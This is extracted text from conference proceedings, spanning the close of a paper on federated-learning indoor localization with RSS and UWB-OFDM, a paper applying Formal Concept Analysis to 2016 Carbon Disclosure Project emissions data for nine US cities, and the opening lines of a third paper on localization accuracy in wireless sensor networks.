The RSS received signal strength method is the most widely used algorithm, which uses the received signal strength values to derive the position information of the clients. This method is divided into two parts, the matrix method and the mathematical method (Fris equation). The first method consists of forming a map of the offline power footprints, and then it compares the data from the matrix obtained online with the database formed offline (Fig. 1). This method is unable to estimate client positions with acceptable accuracy. The latter was not adapted to the changing environment, not adapted to the heterogeneity of the devices, suffers from the multipath problem created by the nondirect visibility between the server and the client, instability of the measurements, etc. Fingerprinting uses either Wi-Fi or Bluetooth as a communication layer. Wi-Fi is more energy-intensive than Bluetooth. This method is easy to deploy on everything with other optimization algorithms such as machine learning algorithms. Some researchers have proposed to train the offline database automatically by using robots that measure the received signal strength values simultaneously (Fig. 1), thus

154

Y. Ibnatta et al.

Fig. 1. Fingerprinting with and without site survey

updating the received signal strength database and making the system more adaptable to the changing environment. This tool is called SLAM. The mathematical received signal strength method is a telecommunication law that describes the factors that influence the sending and receiving of signals. This method is more efficient than the previous one because it doesn’t require any calibration of powers, just the measurement of the values of characteristics such as loss, attenuation, etc. This fundamental tool will link the received signal strength value and the distance, which facilitates the position estimation. However, the multipath problem is a constraint that reduces the performance of all the approaches presented in the literature, which requires other optimization algorithms that lead to systems more adapted to this type of constraint. The inertial sensors are also used to calculate the step and the angle of deviation by the accelerometer, gyroscope, magnetometer, and pedometer. The barometer is used to deduce the floor changes. On the other hand, the triangulation and trilateration algorithms are simpler to deploy some of this based on the calculation of time delay, and others estimate the angle or phase deviation. For example, Time of Arrival (TOA) is a method that calculates the time of arrival of a signal transmitted by a base station. Time Difference of Arrival (TDOA) calculates the difference in time between at least two signals received by the client. The angle of Arrival (AOA) calculates the angle of arrival of a signal transmitted by an access point. Angle Difference of Arrival (ADOA) calculates the angle difference between at least two access points and the client. TOF is the time-of-flight of a signal from the source to the receiver. TOF calculates the internal time difference between the receiver and the transmitter of the source and then the external time difference between the source and the object. The quality of TOF is already demonstrated by robust systems in the market of positioning systems. This method performs better than TOA and TDOA. Vision-based localization is one of the most accurate, high-quality positioning approaches. However, this technique is too expensive in terms of energy consumption, requires powerful computers, also requires high-quality cameras. This method remains limited to certain conditions of use due to

The Indoor Localization System

155

light effects. This technique builds the database of images or videos and then compares the data captured online/offline to estimate the user position. In recent years, the use of machine learning algorithms has increased due to their ability to predict similar results as the true results through automatic machine learning better than traditional filters. In general, machine learning algorithms fall into two categories of learning; supervised learning and unsupervised learning. Each category contains several algorithms. The KNN nearest neighbor algorithm is the most widely used supervised learning algorithm in indoor positioning systems, capable of reducing the error of the basic method. We also have other types of learning such as FL federate learning, RL Reinforcement learning, etc. In this paper, we propose a new indoor localization system based on federated learning FL with the mathematical method of RSS received signal strength using ultra-wideband UWB and orthogonal frequency division modulation OFDM. These three tools can solve the majority of indoor positioning constraints. The main contributions of this work are summarized as follows: – FL-RSS-UWB-OFDM-based localization: In this paper, we propose a new positioning method based on the FL federate learning algorithm as a tool for optimizing the RSS-based algorithm. UWB-OFDM is used as a communication bridge between different system elements. The major constraint of indoor positioning systems is the multipath problem. The most effective solution is to decentralize the approach, that’s why we used FL federated learning. The latter can also decentralize the system to ensure the protection of customer data. – The simulation method: To evaluate the quality of our system, we used three platforms Matlab, Mysql, and JAVA interface. Matlab is used as a system processor, Mysql as a database, and JAVA interface for system control. These three tools facilitate the evaluation of the approach and ensure the correct routing of the data between the algorithm steps. – Improvement of the validation criteria of a positioning system: In our previous work, we assembled several criteria that determine the quality of indoor positioning systems. Our goal is to build a system that respects most of these criteria and validates the proposed approach using a true data type. Otherwise, we demonstrate the nonadherence of the system in the case of erroneous data. In the following, Sect. 2 describes the positioning method based on the learning federate FL and the received signal strength RSS method. Section 3 displays the approach evaluation results. Section 4 shows the performance of the tools used. Finally, Sect. 5 presents the conclusion.

2 Indoor Localization Based on Federated Learning FL and RSS Method In this section, we present the positioning method based on FL federated learning with the RSS received signal strength mathematical model. The objective of using FL federate learning is to decentralize the proposed approach to reduce the negative impact of multipath on the basic algorithm. Our approach ensures direct visibility between

156

Y. Ibnatta et al.

access points and clients, thus avoiding the multipath problem. We test the visibility by a distance threshold that verifies the non-blocking of transmitted signals. Figure 2 shows the proposed system architecture. We measure the initial distance by the following equations: S(t) = A ∗ cos(2 ∗ pi ∗ f 0 ∗ t)

(1)

Pr = (1/N ) ∗ sum(S(t))

(2)

Pr = Pe + Ge + Gr − Aiso − PL

(3)

Aiso = 20 ∗ log(d ) + 20 ∗ log(f ) + 32, 44

(4)

PL(d ) = PL0 + 10 ∗ γ ∗ log(d /d 0) + S(d )

(5)

With S(t) being the transmitted signal, f0 is the transmitted signal frequency, Pr is the received signal strength, and Pe is the transmitted signal strength. Ge and Gr are respectively the gains of the transmitter and the receiver. Aiso is the attenuation. PL is the loss, and PL0 is the loss at d equals d0. γ is the slope, and S(d) is the shadow attenuation. In the following, the system generates the initial model, which composed of two machines as presented in Fig. 3. The received signal strength method is used to form the plane by power values, distances, and position information.

Fig. 2. System Architecture

The first machine links the values of the powers generated in the site survey step with their suitable distances determined in the initial step. We use four access points, so each node is defined by a matrix of four RSSI values. The second machine links the distance values with the position coordinates of each node (machine 1–2).

The Indoor Localization System

157

Fig. 3. The two model machines

After the generation of the internal laws of the two machines, the server sends the initial model to the users, which checks the line-of-sight condition. After that, each user calculates the received signal strength Pr and uses the initial model to estimate the position coordinates by using the following equations: Output1 = Pr ∗ w11 + b11

(6)

distance = Output1 ∗ w21 + b21

(7)

Output2 = distance ∗ w12 + b12

(8)

Position_info = Output2 ∗ w22 + b22

(9)

Postion_info = [Xe, Ye]

(10)

In this paper, we have used federated learning based on the Neural Network algorithm. Afterward, the users expand the database by inserting power values, distance, and position coordinates into the server tables. The server generates the average model and sends it to the users through access points. Then as we presented in the previous paragraphs, each client must connect with access points that verify a distance threshold else, the server must eliminate sending the initial model to that client. Figure 4 shows the federated localization. Algorithm 1 shows the federated localization steps based on RSS and UWB-OFDM.

158

Y. Ibnatta et al.

Fig. 4. The federated tracking

The Indoor Localization System

159

3 Evaluation of Results 3.1 System Parameters In this section, we present the simulation parameters summarized in Table 1. Table 1. System parameters Nu

F0

M

NS

Gr and Ge

Pe

Thd

Fs

Size of area

Number of hidden layers

10/30/50

3*109 hz

4

256

2.5 dB

20 dB

300 cm

12*109 hz

5m*2m

10

Fig. 5. The UWB signal with and after OFDM modulation

We evaluate the approach by the root mean square error RMSE defined by the following equation:  (11) RMSE = ( (xe − xr )2 + (ye − yr )2 where RMSE is the root mean square error, xr, yr, xe, and ye are the reference coordinates and the estimated position coordinates respectively. 3.2 Simulation Setup In this section, we present the simulation that evaluates the performance of the proposed approach. In the simulation part we used the following three tools: MATLAB: MATLAB is used to realize the processes of the system. MYSQL: MYSQL is used as the database of the system. Eclipse (JAVA): Eclipse is the system’s control interface that is used to feed the system with random data, and the visualization of the results.

160

Y. Ibnatta et al.

Fig. 6. The system control interface

Then, the control interface (as shown in Fig. 6) populates the database with random user information and AP data. The database stores random user information and AP access points such as identifiers, reference position coordinates, and algorithm parameters. Once the application completes the initialization step, MATLAB puts the federated localization algorithm into operation to estimate user positions. In addition, MATLAB inserts the results into our system database. The next step is to analyze the simulation results on the control interface. The interface takes the results available in the database and draws the results and curves of the different towers. We have chosen several rounds because of the random values that do not always give the same results. We proposed a 5 m × 2 m simulation environment with four well-positioned static access points.

Fig. 7. The initial and post-turn squared error of the first machine

Figures 7 and 8 display the initial and post-turn squared error for the first and second machines. Table 2 shows the approach evaluation based on the number of rounds and RMSE for machines 1 and 2. Figure 9 shows the result of the proposed system simulation with one round for 10, 30, and three rounds for 50 users, respectively. Figure 10 displays the CDF in the cases of 10 users with five rounds, 30 users with two rounds, and 50

The Indoor Localization System

161

Fig. 8. The initial and post-turn squared error of the second machine

Table 2. The approach evaluation based on the number of rounds and RMSE for machines 1 and 2 Cases

Machine 1 (Initialisation part)

Machine 1 train (1 toure)

Machine 2 (Initialisation part)

Machine 2 train (1 toure)

RMSE

2*10−9

1*10−10

15

13

Fig. 9. The result of the proposed system simulation with one round for 10, 30, and three rounds for 50 users

Fig. 10. The CDF at the cases of 10 users with 5 rounds, 30 users 2 rounds and 50 users with 5 rounds

162

Y. Ibnatta et al. Table 3. Squared error in the case of 10 users with 5 rounds

10 Users after 5 rounds

Round 1

Round 2

Round 3

Round 4

Round 5

RMSE

162.5 cm

140 cm

182 cm

110 cm

150 cm

Table 4. Squared error in the case of 30 users with two rounds 30 Users with two tours

Round 1

Round 2

RMSE

162.5 cm

180 cm

Table 5. Squared error in the case of 50 users with five rounds 50 Users with 5 rounds

Round 1

Round 2

Round 3

Round 4

Round 5

RMSE

140 cm

150 cm

180 cm

150 cm

190 cm

users with five rounds. Tables 3, 4, and 5 present the root mean square error in the case of 10 users with five rounds, 30 users with two rounds, and 50 users with five rounds (Figs. 11, 12 and 13). Table 6. Comparison of proposed approach with other methods The approaches

Federated localization (10 users 5 rounds)

Fingerprint (RSS)

HAIL [4] (BPNN-RSS)

Walkie-Markie

RSS-KNN [11]

AVG(RMSE)

148.9 cm

> 500 cm

870 cm

1650 cm

3740 cm

3.3 Discussion In the chair section, we presented the simulation step of federated localization. In this section, we evaluate our system on three levels. First, on the number of rounds between the initial model and the post-train model. Figures 7, 8, and Table 2 show the performance of federated localization to improve the system quality round after round. The RMSE decreases from 2*10−9 to 10−10 for machine 1 and from 15 to 13 for machine 2. What you can notice is that the error of machine 2 is higher than machine 1, this is explained by the use of the mathematical model of received signal strength RSS which links the received signal strength and the distance which facilitates the regression operation. On the other hand, the second machine uses the Euclidean equation of distance that links

The Indoor Localization System

Fig. 11. The CDF in the case of 10 users with five rounds based on the BLE database

Fig. 12. The CDF for the case of 10 users with 5 rounds based on the Wi-Fi database

Fig. 13. The CDF in the case of 10 users with 5 rounds based on the ZigBee database

163

164

Y. Ibnatta et al. Table 7. Federated localization with different types of databases

The approach

Our approach

FL with Wi-Fi dataset

FL with BLE dataset

FL with ZigBee dataset

AVG(RMSE)

148.9 cm

174.45 cm

158.17 cm

190 cm

the distance and the coordinates of position by the following relation: d 2 = (xAP − xuser )2 + (yAP − yuser )2

(12)

where xuser , yuser are the user position coordinates, xAP , yAP are the access point position coordinates, and d is the distance between user and access point. For this reason, we have proposed to make two machines instead to use one that links the powers and the position coordinates. The weakness of our proposed method and the approaches based on machine learning algorithms is their quality strongly depends on data. This article shows the case of the data that are not totally the good ones to show the strengths of the proposed approach. The error does not exceed 200 cm in bad cases despite the negative effect of the initialization data. What we can extract from Table 7 is that the type of data, whether it is Wi-Fi, Bluetooth Low Energy, or ZigBee based, can have an impact on the quality of the system, so we can notice that the results are close to each other. The average error of our approach after five rounds is 148.9 cm. From Fig. 10, Tables 3, 4, and 5, we can see that the error varies during the rounds in an acceptable range between 100 cm and 190 cm. In the second level, we tested the approach on the number of users. From Tables 3, 4 and 5, we can see that the RMSE is not much influenced by the number of users. For example, in the case of one round with 10, and 30 users the RMSE varies from 162.5 cm to 140 cm in the case of 50 users, which is a crowdsourcing case. The error does not vary in the case of one round between 10 and 30 users. Therefore, the decentralized system can keep its quality despite the number of populations that create the multipath phenomenon. The federated localization has limited signal blocking and can maintain its quality despite the effect of poor data also the crowdsourcing cases. In the third stage, we compare the proposed approach with other popular in the literature. Table 6 shows the quality of our proposed approach compared to the others, etc. RSS-KNN [11] method has an error of 3.74 m, HAIL [4] has an average error of 8.7 m, RSS fingerprint-based methods have an error of more than 5 m and our approach has an average error of 1.49 m. In parallel to this work, we have proposed a new algorithm [14] that uses the notion of the mobile access point model (MAPM) instead of being limited to a static access point that does not cover all users well inside. We participated in crowdsourcing to provide direct visibility between users and the system. This algorithm uses clients as mobile access points, which reduces the use of a high number of static access points. This approach has been successful in most cases in eliminating the NLOS problem. This work showed the quality independent of the initialization data than the federated localization data. Further, MAPM is more adapted to environmental changes. The average MAPM error in the case of 30 users is 10.19 cm and has a detection rate of 86.66% for only one round.

The Indoor Localization System

165

4 Tools Performance Our challenge is to develop a high-quality positioning system. A high-quality system respects the majority of the criteria presented in our work [12]. We recall the criteria for choosing a good localization system: • Precision • • • • • • •

Energy consumption Cost Easy to deploy Stability Response time Adaptation to changes in the environment & the heterogeneity of devices Complexities

To achieve this goal, we have chosen the following tools: – Federated learning FL. – The mathematical method of received signal strength RSS. – Uwb-ofdm The mathematical model of RSS received signal strength is used to build the offline database due to its linearity, which facilitates the regression operation. Federated learning is a decentralized positioning algorithm is used to limit the multipath problem, reduce the switching time between users, ensure the security of users’ data and maintain the good quality of the system in case of crowdsourcing however, their quality is strongly

Fig. 14. The qualities of the three proposed tools

166

Y. Ibnatta et al.

depended of the initial data. UWB-OFDM is a telecommunication and modulation tool that have many good benefits on the system, especially the elevated frequency band, no interference between signals, low cost, low power consumption, and less complexity [13]. Figure 14 summarizes the qualities of the three tools used.

5 Conclusion In this paper, we have presented a new indoor localization system under the name of federated localization. The objective was to meet the majority of the criteria for obtaining a good indoor positioning system. The major constraint of indoor localization systems is the multiple paths. Therefore, we have tried to decentralize the system to limit this problem as much as possible. For these reasons, we have used three tools capable of meeting the above criteria: federated learning, the RSS received signal strength mathematical model and UWB-OFDM. We used the RSS mathematical model to build the database. Then the federated learning-based neural network NN estimates the position information. We simulated the approach with three platforms MATLAB, MySQL, and Java interface to facilitate the simulation step and ensure the good processing of the data. We evaluated the approach on three levels; on the number of rounds, and the number of users, then we compared the approach with other methods. The quality of federated localization depends on the initial data, which may decrease the system performance. The average error of the federated localization is 148.9 cm in the case of 10 users, with 5 rounds better than the others.

References 1. Khatab, Z.E., Hajihoseini, A., Ghorashi, S.A.: A finge print method for indoor localization using autoencoder based deep extreme learning machine. IEEE Sens. Lett. 2(1), 1–4 (2017) 2. Lim, S., Jung, J., Kim, S.-C., et al.: Deep neural network-based in-vehicle people localization using ultra-wideband radar. IEEE Access 8, 96606–96612 (2020) 3. Ciftler, B.S., Albaseer, A., Lasla, N., et al.: Federated learning for rss fingerprint-based localization: a privacy preserving crowdsourcing method. In: 2020 International Wireless Communications and Mobile Computing (IWCMC), pp. 2112–2117. IEEE (2020) 4. Dou, F., Lu, J., Xu, T., et al.: A bisection reinforcement learning approach to 3-D indoor localization. IEEE Internet Things J. 8(8), 6519–6535 (2020) 5. Xue, J., Liu, J., Sheng, M., et al.: A WiFi fingerprint based high-adaptability indoor localization via machine learning. China Commun. 17(7), 247–259 (2020) 6. Waadt, A.E., Wang, S., Kocks, C., et al.: Positioning in multiband OFDM UWB utilizing received signal strength. In: 2010 7th Workshop on Positioning, Navigation and Communication, pp. 308–312. IEEE (2010) 7. Achroufene, A., Amirat, Y., Chibani, A. : RSS-based indoor localization using belief function theory. IEEE Trans. Autom. Sci. Eng. 16(3), 1163–1180 (2018) 8. Shu, Y., Huang, Y., Zhang, J., et al.: Gradient-based fingerprinting for indoor localization and tracking. IEEE Trans. Ind. Electron. 63(4), 2424–2433 (2015) 9. Jang, B., Kim, H.: Indoor positioning technologies without offline fingerprinting map: a survey. IEEE Commun. Surv. Tutorials 21(1), 508–525 (2018) 10. Luo, C., Hong, H., Chan, M.C., et al.: MPiLoc: self-calibrating multi-floor indoor localization exploiting participatory sensing. IEEE Trans. Mob. Comput. 17(1), 141–154 (2017)

The Indoor Localization System

167

11. Chen, Q., Wang, B.: Finccm: fingerprint crowdsourcing, clustering and matching for indoor subarea localization. IEEE Wirel. Commun. Lett. 4(6), 677–680 (2015) 12. Ibnatta, Y., Khaldoun, M., Sadik, M.: Exposure and evaluation of different indoor localization systems. In: Proceedings of Sixth International Congress on Information and Communication Technology, pp. 731–742. Springer, Singapore (2022)https://doi.org/10.1007/978-98116-1781-2_64 13. Ibnatta, Y., Khaldoun, M., Sadik, M.: Indoor localization techniques based on UWB technology. In: Elbiaze, H., Sabir, E., Falcone, F., Sadik, M., Lasaulce, S., Ben Othman, J. (eds.) Ubiquitous Networking. UNet 2021. LNCS, vol. 12845. Springer, Cham (2021). https://doi. org/10.1007/978-3-030-86356-2_1 14. Ibnatta, Y., Khaldoun, M., Sadik, M.: Indoor localization system based on mobile access point model MAPM using RSS with UWB-OFDM. IEEE Access (2022)

Artificial Intelligence for Smart Decision-Making in the Cities of the Future Youssef Mekki1(B) , Chouaib Moujahdi2 , Noureddine Assad1 , and Aziz Dahbi1 1

National School of Applied Sciences, Chouaib Doukkali University, El Jadida, Morocco [email protected],{assad.n,dahbi.a}@ucd.ac.ma 2 Scientific Institute, Mohammed V University in Rabat, Rabat, Morocco [email protected]

Abstract. Global urbanization is growing at a rapid pace and in the near future most of the world’s population will move to cities. This trend will be extremely challenging for: land use management, sustainable urban development, food supply, security and general human wellbeing. Thus, for several years, emerging technologies and new concepts of smart cities have been proposed to ensure optimal management of the cities of the future, namely artificial intelligence applications such as: The Internet of Things (IoT), the Machine Learning (ML) and the Deep Learning (DL). In this context, we propose in this paper a methodology that is based on the use of the Formal Concept Analyzes (FCA) method on some qualitative data points obtained from the City Carbon Disclosure Project (CDP) database to generate some Key Performance Indicators (KPIs) that can help and guide decision makers to reduce CO2 emissions and build as well efficient sustainable development strategies, especially for the cities of the future. We have focused our experimentation on 9 American cities. Our experimental results show that New York is the city that emits the most CO2 and that the emission sources are: transportation, urban land Use and Energy Demand in Buildings. Keywords: Smart Cities · Urban Sustainability · CDP Project Formal Concept Analyses · Key Performance Indicators

1

·

Introduction

Today, more than half of the world’s population are living in cities. In 2050, this rate will increase to be nearly seven out of ten people. Indeed, cities contribute more than 70% of global carbon emissions and 60–80% of energy consumption. In addition to these environmental issues, rapid urbanization has created additional challenges, such as social inequalities, traffic congestion and water contamination, as well as associated health issues. There is currently a consensus that governments can use Information and Communication Technologies (ICTs), together with renewable energy and other c The Author(s), under exclusive license to Springer Nature Switzerland AG 2023  J. Kacprzyk et al. (Eds.): AI2SD 2022, LNNS 712, pp. 168–178, 2023. https://doi.org/10.1007/978-3-031-35251-5_15

Artificial Intelligence for Smart Decision-Making in the Cities of the Future

169

technologies, to build smarter and more sustainable cities. A smart and sustainable city is an innovative city that uses ICTs to improve the quality of life of its population, the efficiency of urban management and the urban services, while respecting the needs of current and future generations, that are related to the economic, social, environmental and cultural fields [5,6]. The main objective of this paper is to prove how we can use some artificial intelligence techniques to develop a methodology that can generates some Key Performance Indicators (KPIs) related to environmental and social issues of the cities of the future. We believe that such indicators can be used later to answer several critical questions like: – How can we help cities of the future to adapt rapidly to the changing climate in the midst of a global pandemic, but do so in a way that is socially equitable? – In what projects we can invest to help cities to emerge from a recession, alleviate climate problems, without generating or perpetuating racial/social inequalities? We believe that answering such questions will help absolutely to achieve properly the environmental sustainability goals for the cities of future [3]. The rest of the paper is organized as follows. In Sect. 2, we will present the proposed methodology then we will review all used tools to build it: The FCA method, the Concept Lattices and the data extraction environment. Our results and discussion are provided in Sect. 3. Finally, we conclude the paper in Sect. 4.

2

Proposed Methodology

The main four steps of the proposed methodology are as follow (see Fig. 1): 1) The datasets analysis to build the Cross tables. 2) The conclusions of the first level using the association rules of the FCA function (e.g., Emissions Reduction Activities). 3) The extraction of the second level where there are no definitive

Fig. 1. The main steps of our proposed methodology.

170

Y. Mekki et al.

answers. 4) Applying the FCA conceptual lattice to qualitative datasets to guide decision makers in their sustainable development strategy. To give an example on how we can generate the desired KPIs, we will use in this paper the qualitative data provided in the written documents/texts/statements of the 2016 City Carbon Disclosure Project [1] that contains several datasets. In this context, five major datasets were chosen and then examined for this work: 1) Anticipated economic opportunities, 2) Urban sustainability development incentives, 3) City emissions reduction activities, 4) Methodologies/guidelines for improving the environmental sustainability of the city and 5) Emission reduction targets. We have focused our study on 9 American cities (Los Angeles, Cleveland, Park City, UT, Pittsburgh, Austin, Chicago, San Francisco, New York City and Dallas) that were explored in more detail using the four-step process, as shown in the Fig. 1. In next subsections, we will present all used methods in these four steps. 2.1

Formal Concept Analysis

Formal Concept Analysis (FCA) [4] focuses on studying concepts when they are formally described, in other words, when the context and the concepts are completely and precisely defined. It was proposed by Rudolf W ille in 1982 [7] as an application of the lattice theory. It is based on the previous work of [7], that is based as well on the whole lattice theory. Therefore, in our paper the cross tables have been generated for the attributes and objects selected in each dataset. For example, referring back to Table 1, one of the association rules or implications generated by the Concept Explorer [2] is shown below: < 1 out of 1 cities > T raining = [100%] ⇒< 1 > M onetary Recognition

Fig. 2. Anticipated Economic Opportunities - 9 Cities on USA.

Artificial Intelligence for Smart Decision-Making in the Cities of the Future

171

On a simple presentation like the one shown in Table 2, the first-tier conclusions are easy to see: < 4 out of 4 cities > Increased energy security ⇒ Development of new business industries (e.g. clean tech)

While the generic form of implication without any premise(s), or antecedent(s), is shown below: ⇒ {} Conclusion(s) The symbol {} means that the conclusion has empty premise. This occurs when all objects or the majority of objects favor the same attribute listed in the cross table. For example, in Table 3 (column 2), we note the following association rule: < 6 out of 6 cities > {} = [67%] ⇒ Recognition Another example can be found in Fig. 2: < 7 out of 7 cities > {} = [78%] ⇒ Increased inf rastructure investment

Fig. 3. Types of Incentives - 9 Cities on USA.

The proportion of object leaning towards this particular implication is also 100%. If the association rules or implications result in a proportion of objects less than 100% (i.e., the consequence is only true for some objects), we consider them as special cases. Moreover, we examine cases where the number of objects is about half of the total number of objects in the crosstab. For example, in Table 3 (column 3): < 6 out of 6 cities > M ass T ransit = [86%] ⇒ Buildings Energy Supply W aste

172

2.2

Y. Mekki et al.

Concept Lattices

The concept lattices are outlined on three levels. First, basics on concept lattices are explained starting from simple data contexts which consist of a binary relation between objects and attributes indicating which object has which attribute. On the second level, conceptual relationships are discussed for data matrices which assign attribute values to each of the given objects. Finally, a mathematical model for conceptual knowledge systems is described. This model allows us to study mathematically the representation, inference, acquisition, and communication of conceptual knowledge [6]. For example, for the analysis referring to Table 1, we can start with a few basic questions: – What is common for object 9 (i.e., New York City) and object 2 (i.e., Cleveland)? – What is common for attribute 2 (i.e., Recognition) and attribute 5 (i.e., Tools and Resources)? It turns out that the only two common attributes are: Monetary (see, for example, Fig. 3). To answer the second question, we have to identify the object or objects that share both attributes. Only one object has all these attributes which is “Chicago” (see Fig. 3).

Fig. 4. Beneficiary of Incentive - 9 Cities on USA.

Further we note that “Business” attribute is considered relevant by Chicago (C40) (see Fig. 4). 2.3

Data Extraction Environment

In this paper we extract data using the “Pandas” library which is a package that provides fast, flexible and expressive data structures that are designed to

Artificial Intelligence for Smart Decision-Making in the Cities of the Future

173

make working with “relational ” or “labeled ” data easier and intuitive. It aims to be the fundamental high-level building block for doing practical real-world data analysis in Python. We confirm that the overall process of the proposed methodology (see Fig. 1), including the data extraction, is as follow: – Analyze databases to process the large volumes of data in order to discover meaningful, useful and reusable “patterns”. In our case we choose 9 cities in the United States. – Apply The basic procedure of formal concept analysis (FCA) based on a simple data representation, (i.e. a binary array called formal context). Each formal context is transformed into a mathematical structure called a Concept Lattice. – Build the second level of conclusions. Through the use of FCA function association rules, we extract the second level definitive answers on sustainable urban development. At this level, we can also identify situations where there are no definitive answers on how to activate interventions/mechanism to achieve a favorable outcome. The main objective here is to be able to convert the results of the first and second levels into actions. – Extract sources of CO2 emissions by domain to help Policy makers to improve sustainable development in their cities.

Fig. 5. Emissions Reduction Activities - 9 Cities on USA.

We confirm as well that in this work we ha used the following main CDP city datasets: 1. Anticipated Economic Opportunity (Source: Carbon Disclosure Project (CDP) - Cities-2016 Anticipated Economic Opportunities) has items such

174

2.

3.

4.

5.

6.

Y. Mekki et al.

as operational efficiency, infrastructure investment, and development of new business (column G); Types of Incentives (Source: Carbon Disclosure Project (CDP) - CitiesIncentives-to-Reduce-GHG-Emissions-2015 ) has indicators such as monetary and recognition (column H); Emissions Reduction Activity (Source: Carbon Disclosure Project (CDP) Cities-Emissions-Reduction-Activities-2016 ) shows sectors of activity such as transport, energy demand in building, water, and waste (column H); Methodology/Guidelines (Source: Carbon Disclosure Project (CDP) Citywide-GHG-Emissions-2016 ) displays primary methodologies (column H) such ad IPCC guidelines, ICF methodology, and International Emissions Analysis Protocol (ICLEI); Beneficiary of Incentive (Source: Carbon Disclosure Project (CDP) - CitiesIncentives-to-Reduce-GHG-Emissions-2015 ) has indicators such as citizens and city employees (column G); Cities-Emissions-Reduction-Targets-2016 Includes baseline emissions (column H), baseline year, Relevant GHG Sources (column G), percentage reduction target, and other details. Some cities report multiple targets.

3

Results and Discussion

As shown in Table 1, each row in the cross table is a separate object in the US data (e.g., Dallas) and each object in the cross table is associated with a number of attributes (e.g., Recognition). Further, an “X” mark is used to display links between objects and attributes. Table 1. Type of incentive to reduce GHG Emissions (Source: Cities-Incentives-toReduce-GHG-Emissions-2015 ) City

Monetary Recognition

Training

Cleveland

X

X

X

Park City, UT

X

X

Nonmonetary

Tools & Budget Resources allocations

Los Angeles (C40)a

Pittsburgh

X

X

Austin (C40)

X

Chicago (C40)

X

Dallas

X

San Francisco (C40)

X

New York City (C40) a

X

X

No data is available about Los Angeles in this part of the database;

The challenge at the first level is to find the few vital conclusions or implications. As mentioned in Sect. 2.1, FCA’s associated rule is used as the first layer of filtering tool. We determine that the implications with the symbol and

Artificial Intelligence for Smart Decision-Making in the Cities of the Future

175

all objects favoring the same attribute in the crosstab belong to the top-level “finding” group. In other words, the proportion of object leaning towards this particular implication is 100%. Table 2 presents the conclusions of the first level. They are: < 1 out of 1 cities > T raining = [100%] ⇒ Monetary Recognition We can observe in the Fig. 5 that “Transport” is the main emissions reduction activity in the USA. Table 2. Type of incentive to reduce GHG Emissions (Source: Cities-Incentives-toReduce-GHG-Emissions-2015 ) Anticipated Economic Opportunities

Types of Incentives

Emissions Reduction Activities

Methodologies Beneficiary & Guidelines of Incentive

USA 4 Increased 1 Training ⇒ 6 Buildings energy security Monetary Mass Transit ⇒a Recognition ⇒ Energy Supply Waist Development of new business industries (e.g. clean tech) 1 The sign connecting premise and conclusion;

4 Citizens ⇒ City employees

It should be noted that methodologies are not included in the first level that is shown in the Fig. 1. It is also observed that the results based on FCA’s associated rule not only show some of the similarities between the regions we studied, but also differences that can be region dependent. Table 3. Second Tier Conclusions or No Definite Conclusions Anticipated Economic Opportunities USA { }1 = [78%]2 ⇒ Increased infrastructure investment

Types of Incentives { } = [67%] ⇒

Recognition

Emissions Reduction Activities

Methodologies & Guidelines

Mass Transit = [86%] ⇒ Buildings Energy Supply Waste 1 The conclusion (or implication) has empty premise; 2 The proportion of objects derived from the approximate rule;

Beneficiary of Incentive { } = [67%] ⇒ City employees

Table 3 presents the conclusions of the second level: the special cases (i.e., the implication giving the proportion of objects is less than 100% with or without premise(s)) and cases without definitive conclusions (or implications).

176

Y. Mekki et al.

At this level, we also observe that methodologies/guidelines adopted for the ongoing implementation of urban sustainability development initiatives are not included. In Table 4, the findings are collated so that decision-makers and stakeholders can get a glimpse of new business rules to guide the development of urban sustainability. Table 4. All Cases derived from FCA’s Association Analyses Anticipated Economic Opportunities USA 4 Increased energy security ⇒ Development of new business industries (e.g. clean tech) { } = [78% ] ⇒ Increased infrastructure investment

Types of Incentives

Emissions Reduction Activities

Training ⇒ Monetary Recognition { } = [67%] ⇒

Recognition

6 Buildings X1 Mass Transit ⇒ Energy Supply Wast Mass Transit = [86%] ⇒ Buildings Energy Supply Waste

1 No Definite Conclusions (i.e., less than clusions /implications);

1 2

Methodologies Beneficiary of & Guidelines Incentive 4 Citizens ⇒ City employees { } = [67%] ⇒ City employees

of total objects are found to support any con-

Figure 6 shows the methodology/guidelines adopted by cities, as shown in Fig. 6, “U.S. Community Protocol for Accounting and Reporting of Greenhouse Gas Emissions (ICLEI)” is considered relevant by Cleveland, Pittsburgh and Austin(C40).

Fig. 6. Methodologies and Guidelines- 9 Cities on USA.

Figure 7, generated from the CDP database, summarizes the results of CO2 emissions of the nine studied American cities. It is clear that New York is the city that emits the most CO2 , emission sources are: transportation, urban land Use and Energy Demand in Buildings.

Artificial Intelligence for Smart Decision-Making in the Cities of the Future

177

Fig. 7. CO2 Emission by cities - 9 Cities on USA.

4

Conclusion and Perspectives

In this paper, we present a methodology that can generate several key performance indicators (KPIs) related to environmental and social issues of the cities of the future. We believe that such indicators can help makers to reduce CO2 emissions and build efficient sustainable development strategies, especially for the cities of the future. We have used in this work the 2016 City Carbon Disclosure Project datasets. We plan to use the CDP 2020 datasets in our future works to generates KPIs. In addition, we plan to optimize the proposed methodology for sustainable cities while using green computing techniques and the Deep Leaning architectures as well [6].

References 1. Carbon disclosure project, 2016 datasets. city files cdp public data. https://data. cdp.net/. Accessed 30 Mar 2022 2. Fca software concept explorer. http://conexp.sourceforge.net/. Accessed 30 Mar 2022 3. Lopes, N.V.: Smart governance: a key factor for smart cities implementation. In: 2017 IEEE International Conference on Smart Grid and Smart Cities (ICSGSC), pp. 277–282 (2017). https://doi.org/10.1109/ICSGSC.2017.8038591 4. Madu, C.N., hua Kuei, C., Lee, P.: Urban sustainability management: a deep learning perspective. Sustainable Cities Soc. 30, 1–17 (2017)

178

Y. Mekki et al.

5. Nosratabadi, Saeed, Mosavi, Amir, Keivani, Ramin, Ardabili, Sina, Aram, Farshid: State of the art survey of deep learning and machine learning models for smart cities and urban sustainability. In: V´ arkonyi-K´ oczy, Annam´ aria R.. (ed.) INTERACADEMIA 2019. LNNS, vol. 101, pp. 228–238. Springer, Cham (2020). https:// doi.org/10.1007/978-3-030-36841-8 22 6. Rhoads, D., Sol’e-Ribalta, A., Gonz’alez, M.C., Borge-Holthoefer, J.: Planning for sustainable open streets in pandemic cities. arXiv: Physics and Society (2020) 7. Wille, R.: Restructuring lattice theory: an approach based on hierarchies of concepts. In: Ordered Sets, pp. 445–470. Springer, Netherlands (1982)

Performance Comparison of Localization Techniques in Term of Accuracy in Wireless Sensor Networks Omar Arroub1(B) , Anouar Darif2 , Rachid Saadane3 , and Moly Driss Rahmani1 1 LRIT-GSCM Associated Unit to CNRST (URAC 29), FSR Mohammed V-Agdal University,

